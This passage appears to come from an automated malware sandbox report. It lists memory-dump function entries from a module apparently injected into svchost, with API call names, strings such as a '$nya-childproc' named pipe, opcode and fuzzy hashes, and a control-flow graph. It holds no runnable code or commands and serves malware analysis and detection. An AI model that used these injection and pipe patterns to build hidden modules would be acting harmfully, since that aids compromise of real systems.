                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction ID: 83a760fde54ee1c5f207a7528977c86193a96b1b5316f8e0d94e5d4ef025fc8b
                                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction Fuzzy Hash: 85D18D2AD007409AFBA8AFA5E65839E77B0F755798F100935DB8957797CB78C481C700

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\$nya-childproc
                                                  • API String ID: 166002920-3933612297
                                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction ID: 56fa6b07a625ae531577085f785817776d22235ed9cb5571334ba84ca8f443b3
                                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction Fuzzy Hash: 2D116A3AA18B4092E7909F61F62831A7770F38DB94F945230EB9902AA9CFBDC144CB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000003.1646195511.0000022F4B8F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_3_22f4b8f0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: bd218116f59a5c56efc38000c5aded2ca847f2db8270a2ecf24cb78a0c5da713
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: CC81A23CE00241B6FAD4BFE9DA59B5B32B1AB86782F5440359B0947397FAB8C957C700

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 456 22f4b927c50-22f4b927c56 457 22f4b927c91-22f4b927c9b 456->457 458 22f4b927c58-22f4b927c5b 456->458 461 22f4b927db8-22f4b927dcd 457->461 459 22f4b927c85-22f4b927cc4 call 22f4b9282f0 458->459 460 22f4b927c5d-22f4b927c60 458->460 476 22f4b927d92 459->476 477 22f4b927cca-22f4b927cdf call 22f4b928184 459->477 462 22f4b927c62-22f4b927c65 460->462 463 22f4b927c78 __scrt_dllmain_crt_thread_attach 460->463 464 22f4b927dcf 461->464 465 22f4b927ddc-22f4b927df6 call 22f4b928184 461->465 467 22f4b927c71-22f4b927c76 call 22f4b928234 462->467 468 22f4b927c67-22f4b927c70 462->468 471 22f4b927c7d-22f4b927c84 463->471 469 22f4b927dd1-22f4b927ddb 464->469 479 22f4b927df8-22f4b927e29 call 22f4b9282ac call 22f4b92814c call 22f4b928634 call 22f4b928450 call 22f4b928474 call 22f4b9282dc 465->479 480 22f4b927e2b-22f4b927e5c call 22f4b9284b0 465->480 467->471 481 22f4b927d94-22f4b927da9 476->481 488 22f4b927ce5-22f4b927cf6 call 22f4b9281f4 477->488 489 22f4b927daa-22f4b927db7 call 22f4b9284b0 477->489 479->469 490 22f4b927e6d-22f4b927e73 480->490 491 22f4b927e5e-22f4b927e64 480->491 508 22f4b927d47-22f4b927d51 call 22f4b928450 488->508 509 22f4b927cf8-22f4b927d1c call 22f4b9285f8 call 22f4b92813c call 22f4b928168 call 22f4b92b428 488->509 489->461 496 22f4b927eb5-22f4b927ecb call 22f4b923a1c 490->496 497 22f4b927e75-22f4b927e7f 490->497 491->490 495 22f4b927e66-22f4b927e68 491->495 503 22f4b927f52-22f4b927f5f 495->503 517 22f4b927f03-22f4b927f05 496->517 518 22f4b927ecd-22f4b927ecf 496->518 504 22f4b927e81-22f4b927e84 497->504 505 22f4b927e86-22f4b927e8c 497->505 506 22f4b927e8e-22f4b927e94 504->506 505->506 513 22f4b927e9a-22f4b927eaf call 22f4b927c50 506->513 514 22f4b927f48-22f4b927f50 506->514 508->476 530 22f4b927d53-22f4b927d5f call 22f4b9284a0 508->530 509->508 557 22f4b927d1e-22f4b927d25 __scrt_dllmain_after_initialize_c 509->557 513->496 513->514 514->503 520 22f4b927f07-22f4b927f0a 517->520 521 22f4b927f0c-22f4b927f21 call 22f4b927c50 517->521 518->517 525 22f4b927ed1-22f4b927ef3 call 22f4b923a1c call 22f4b927db8 518->525 520->514 520->521 521->514 539 22f4b927f23-22f4b927f2d 521->539 525->517 550 22f4b927ef5-22f4b927efa 525->550 546 22f4b927d61-22f4b927d6b call 22f4b9283b8 530->546 547 22f4b927d85-22f4b927d90 530->547 544 22f4b927f2f-22f4b927f32 539->544 545 22f4b927f34-22f4b927f42 539->545 551 22f4b927f44 544->551 545->551 546->547 558 22f4b927d6d-22f4b927d7b 546->558 547->481 550->517 551->514 557->508 559 22f4b927d27-22f4b927d44 call 22f4b92b3f0 557->559 558->547 559->508
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: 6da2365d5e17544b82aac065803e710dae94bd682bc38aef71eae997fec83743
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: 4681E528E05640B6FAD8BFE5D6B93AB62B1AB85780F5488349B4857397DBFCCC45C310
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929B31
                                                  • GetLastError.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929B69
                                                  • FreeLibrary.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: ec79bae74621d3473f9289de3cbe0439ae45c8112a6144b4fb78fd3ca3ac7a4a
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: C3310A2DE12640A1FE99BFA6E6287A723B4BB59B60F590938DE1D47792DF7CC044C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: d7620b8c19884500c47e3124fb66e9135124c8218baa58d1833e4fac0ed32348
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: F1118129A14A4092E7D0AF92EA6C71A67B0F38CBE4F405234EB5D87B96CFB9C404C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction ID: 54a9b70a4ef810b0383967a9bfaf94ee71e1065358e960c329d1809482fffa67
                                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction Fuzzy Hash: 1ED18D3AA08B4891EAB49F5AE5A435A77B0F388B84F100535EBCD47B66DF7CC551CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: e4614e4e50a161e2bb6536ae214093138366ffb694989e2a8f17203713cc93de
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: F451B328E01B55B5FE8DBFA5EA782A637B1BB04745F804C35962C067A7EFB8C564C340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $nya-
                                                  • API String ID: 756756679-1266920357
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: f6368292fef801f456ef4d047ad2896ab5c4a3f22002196d8df88fadc90d907f
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: C8319529F05B55A6F698EF96D76932A63B4FB44B84F0848308F4807B56EFB8C461C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: 5caee82ebc5799ff4bab53cc8ea9f8870476772665104bd938d6c37ff24bf77e
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: 88112E2DE1524072F6DC7FB1E63E36B22719F89790F545A34AA66563D7CEACC441C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: 0a567cbdcd35ce77fb9ef5d2f757b24a0b632dea675aeb3ca454db5b1b0a9327
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: E8015B29B00A4092FA94EF92E9A835A63B1FB8CFC0F4840349F8D43755DEBDC995C780
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: c7e426ad3a8663a85c993172cbf675b4bc21cb55f235fc4e2dcdafeb815fee9c
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: A8012D69A1574096FBA8AFA2E9AC71777B1BB4DB45F040434CB4D06366EF7EC458C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: c7868ee6e994c88c368ac7911b9c882d734e1b19883b4664ddc12e81d6a56a24
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: 7CF0A42AB04685A2F7A0AFA0F6A835A6371F74CB88F845031DB4942559DFADC668C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction ID: b8b2264c96036f2fd40b0f46cf7ae1827fe0674ee32b204284edde0178c0ef05
                                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction Fuzzy Hash: 43F05458F04B80D2EEC46F92FA2815B5274A74CFC0F445030EF1647B1ACEACC445C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: a04504cd0d85b7767a6ae057d92d07373024f35898ec03b55c9c901403f2537f
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: 1FF09629A0470161FA94AF94D9A935B2370EB4D7A4F541639DB6A451E6CFACC448C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction ID: 8cf9ec95656e8e5e87e39a662f5ad30ac03dab08b7211d00651beb1416509c21
                                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction Fuzzy Hash: E202EA36919B8096EBA4DF55E5A435BB7B0F384794F104435EB8E87B6ADBBCC484CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: e299e2d91b18ef67838866c18cdec6bfca9fe4556afd804b4f662d50e4966460
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: 2D51C239E04610A7E7A8EF96E96865B77B0F388B80F104939DF4A43756DBBCC945C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction ID: d34dbc50e84e899d59484e42c8476de88141fb153c2056850e267d03047b682d
                                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
